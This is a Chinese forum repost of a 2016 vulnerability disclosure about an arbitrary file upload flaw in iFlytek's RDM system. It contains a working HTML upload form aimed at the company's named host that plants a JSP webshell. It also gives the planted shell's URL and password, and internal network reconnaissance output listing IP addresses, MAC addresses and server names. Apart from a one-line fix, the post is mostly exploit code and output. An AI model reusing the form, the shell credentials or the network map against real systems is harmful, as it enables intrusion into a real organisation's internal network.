HanDs
管理员

[7月漏洞公开] 科大讯飞某系统修复不当可任意文件上传已shell可内网 



任意文件上传已shell可内网

详细说明:

讯飞RDM系统

http://rdm.iflytek.com:2000/

构造本地上传页面

code 区域
<html>
<form action="http://rdm.iflytek.com:2000/upload?dir=cmVwb3NpdG9yeQ==&name=d3BwMS5qc3A=&start=0&size=7000&" method="post" enctype="multipart/form-data">
<input type='file' name='file' />
<input type='hidden' name='filename' value="null" />
<input type='hidden' name='id type=' value="" />
<input type="submit" value='提 交' name="Submit"></form>
repository/000000000/wpp1.jsp
</html>

漏洞证明:

shell:http://rdm.iflytek.com:2000/repository/000000000/wpp1.jsp

密码:023

QQ截图20160522132743.png



code 区域
[*] 基本信息 [ C:D:E:F: ]

D:\Program Files\Bronzesoft\RDM\Application\rdmapp\power\> arp -a

接口: 192.168.75.68 --- 0x10
Internet 地址 物理地址 类型
169.254.176.137 78-2b-cb-2a-a2-9a 动态
192.168.75.1 70-ba-ef-73-b3-00 动态
192.168.75.3 e4-11-5b-0c-54-c0 动态
192.168.75.6 00-1e-c9-e9-cc-58 动态
192.168.75.11 00-90-0b-18-d4-4d 动态
192.168.75.14 22-7a-83-b7-95-aa 动态
192.168.75.29 ec-f4-bb-c7-3e-58 动态
192.168.75.31 78-2b-cb-2a-a2-9a 动态
192.168.75.55 e0-db-55-1e-d8-70 动态
192.168.75.69 00-1e-4f-3d-e2-4c 动态
192.168.75.90 e4-11-5b-0c-52-6c 动态
192.168.75.98 9a-34-2f-43-ee-d3 动态
192.168.75.100 00-0f-1f-6d-8e-eb 动态
192.168.75.101 00-1c-54-69-e8-c3 动态
192.168.75.112 d4-ae-52-6f-82-72 动态
192.168.75.118 b4-99-ba-bb-d4-2a 动态
192.168.75.119 00-90-0b-17-7b-e9 动态
192.168.75.121 98-4b-e1-01-9b-4a 动态
192.168.75.122 e4-11-5b-11-2d-84 动态
192.168.75.124 00-1c-54-30-2c-83 动态
192.168.75.126 1c-c1-de-1e-88-2a 动态
192.168.75.135 f2-89-89-04-7c-8d 动态
192.168.75.137 7e-af-cd-55-69-ee 动态
192.168.75.146 74-86-7a-e2-ff-a0 动态
192.168.75.155 00-1b-78-39-1c-00 动态
192.168.75.156 00-25-b3-1b-48-24 动态
192.168.75.167 d4-ae-52-ab-15-53 动态
192.168.75.169 b8-ca-3a-f7-03-6a 动态
192.168.75.170 14-18-77-34-aa-73 动态
192.168.75.184 00-14-5e-2a-6a-eb 动态
192.168.75.199 00-1a-a0-0c-5a-64 动态
192.168.75.209 18-a9-05-65-88-8a 动态
192.168.75.241 b4-99-ba-c0-5e-c8 动态
192.168.75.250 00-01-29-50-f7-f0 动态
192.168.75.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
255.255.255.255 ff-ff-ff-ff-ff-ff 静态


D:\Program Files\Bronzesoft\RDM\Application\rdmapp\power\> net view
服务器名称 注解

-------------------------------------------------------------------------------
\\77-99-YYZY
\\BAOXIAO
\\CHANPINBAO
\\EMBEDDED-1
\\HPDL380
\\NDOMAINSVR
\\NEWDOMAINBK2
\\RDM
\\RDM1
\\SHARE
\\SVCTAG-GVB7B3X
\\SVN-169
\\TECHCENT
\\US3
\\WIN-82MES14V4GQ
\\WIN-HUQHMVI2UV5
\\XFDATA
\\YYZY-03
命令成功完成。



D:\Program Files\Bronzesoft\RDM\Application\rdmapp\power\>





QQ截图20160522132827.png

修复方案:

补丁or下线,删除shell


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
科大
#1楼
发帖时间:2016-7-6   |   查看数:0   |   回复数:0
游客组
快速回复